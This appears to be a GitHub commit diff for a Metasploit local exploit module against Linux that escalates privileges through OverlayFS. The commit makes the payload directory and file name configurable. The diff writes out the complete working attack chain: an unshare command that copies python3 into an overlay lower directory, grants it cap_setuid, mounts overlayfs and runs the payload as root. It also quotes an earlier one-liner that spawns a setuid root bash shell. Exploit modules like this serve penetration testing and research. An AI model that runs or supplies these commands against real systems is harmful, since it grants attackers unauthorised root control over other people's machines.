Skip to content

Commit e619612

Browse files
author
Corey
committed
Create dynamic payload
1 parent af91d97 commit e619612

File tree

1 file changed

+19
-8
lines changed

1 file changed

+19
-8
lines changed

modules/exploits/linux/local/game_overlay_privesc.rb

Lines changed: 19 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -46,8 +46,8 @@ def initialize(info = {})
4646
)
4747
)
4848
register_options [
49-
OptString.new('PayloadDir', [true, 'Directory to store payload.', '/tmp/sysdtest/']),
50-
OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv.elf'])
49+
OptString.new('PayloadDir', [true, 'Directory to store payload.', '/tmp/main/']),
50+
OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
5151
]
5252
end
5353

@@ -94,9 +94,9 @@ def check
9494
end
9595

9696
def execute_command(_cmd, _opts = {})
97-
datastore['PayloadFilename']
97+
pay_file = datastore['PayloadFilename']
9898

99-
datastore['PayloadDir']
99+
pay_dir = datastore['PayloadDir']
100100

101101
directories = %w[l u w m].flat_map { |e| "/tmp/main/#{e}" }
102102

@@ -106,17 +106,28 @@ def execute_command(_cmd, _opts = {})
106106
print_status "Creating directory #{dir}"
107107
cmd_exec "mkdir -p #{dir}"
108108
end
109-
# register_dir_for_cleanup "/tmp/main/"
110109

111-
write_file '/tmp/main/marv', generate_payload_exe
110+
register_dir_for_cleanup "/tmp/main/"
111+
112+
print_status "Creating directory to store payload: #{pay_dir}"
113+
pay_dir.concat "/" unless pay_dir.ends_with? "/"
114+
cmd_exec "mkdir -p #{pay_dir}"
115+
116+
register_dir_for_cleanup pay_dir
117+
118+
pay = "#{pay_dir}#{pay_file}"
119+
120+
print_status "Writing payload: #{pay}"
121+
122+
write_file "#{pay}", generate_payload_exe
112123
# works move test to low, run unshare mount set cap, shell
113124

114125
print_status 'Starting new namespace, and running exploit...'
115126

116-
hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0);os.system(\"chmod 4755 /tmp/main/marv && /tmp/main/marv\")' "
117-
118127
# g1vi original
119128
# "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
129+
hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' "
130+
120131
print_status "Running exploit: '#{hack}' "
121132
puts cmd_exec_with_result(hack)
122133
end

0 commit comments

Comments
 (0)